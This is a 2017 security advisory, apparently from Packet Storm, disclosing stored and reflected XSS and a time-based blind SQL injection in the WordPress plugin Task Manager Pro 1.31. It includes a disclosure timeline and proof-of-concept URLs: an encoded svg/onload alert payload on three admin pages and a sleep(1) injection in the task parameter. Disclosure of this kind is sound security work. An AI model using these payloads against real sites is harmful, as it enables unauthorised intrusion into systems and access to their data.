WordPress Task Manager Pro 1.31 Cross Site Scripting

2017-07-19T00:00:00
ID PACKETSTORM:143419
Type packetstorm
Reporter 8bitsec
Modified 2017-07-19T00:00:00

Description

# Exploit Title: WordPress Task Manager Pro 1.31 - Multiple vulnerabilities  
# Date: 2017-07-11  
# Exploit Author: 8bitsec  
# Vendor Homepage: https://www.w3bd.com/  
# Software Link: http://codecanyon.net/item/task-manager-pro-all-in-one-project-based-task-management-plugin-for-wordrpress/19864872  
# Version: 1.31  
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]  
# Email: contact@8bitsec.io  
# Contact: https://twitter.com/_8bitsec  
  
Release Date:  
=============  
2017-07-11  
  
Product & Service Introduction:  
===============================  
Task Manager Pro is a full-featured task management plugin for WordPress.  
  
Vulnerability Disclosure Timeline:  
==================================  
2017-07-10: Found the vulnerabilities.  
2017-07-10: Reported to vendor.  
2017-07-11: No response.  
2017-07-11: Published.  
  
Technical Details & Description:  
================================  
  
Multiple authenticated XSS vulnerabilities (stored and reflected), several of them reachable while logged in as a low-privileged user.  
  
Time-based blind SQL injection in the task parameter of the task-details page.  
  
Proof of Concept (PoC):  
=======================  
  
Authenticated Stored XSS:  
  
Logged in as a follower (the lowest-privileged role), write the payload into the 'Add a comment' field; it is stored and later rendered without escaping.  
  
Authenticated Reflected XSS  
  
On the task-edit, task-details and project-details pages the task / project GET parameter is reflected into the page without escaping:  
  
https://localhost/wp-admin/admin.php?page=task-edit&task=8%2F%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E  
https://localhost/wp-admin/admin.php?page=task-details&task=6%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E  
https://localhost/wp-admin/admin.php?page=project-details&project=%22%2F%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E  
  
Authenticated Stored XSS  
  
Logged in as a user with edit privileges: in the Edit Task section, the Task Name and Time Estimation fields are vulnerable.  
  
Blind SQL Injection  
  
Logged in as a follower, the task parameter reaches a SQL query; the payload below (6 and sleep(1) and 1=1) delays the response by about one second:  
https://localhost/wp/wp-admin/admin.php?page=task-details&task=6+and+sleep(1)+and+1%3D1  
  
Credits & Authors:  
==================  
8bitsec - [https://twitter.com/_8bitsec]  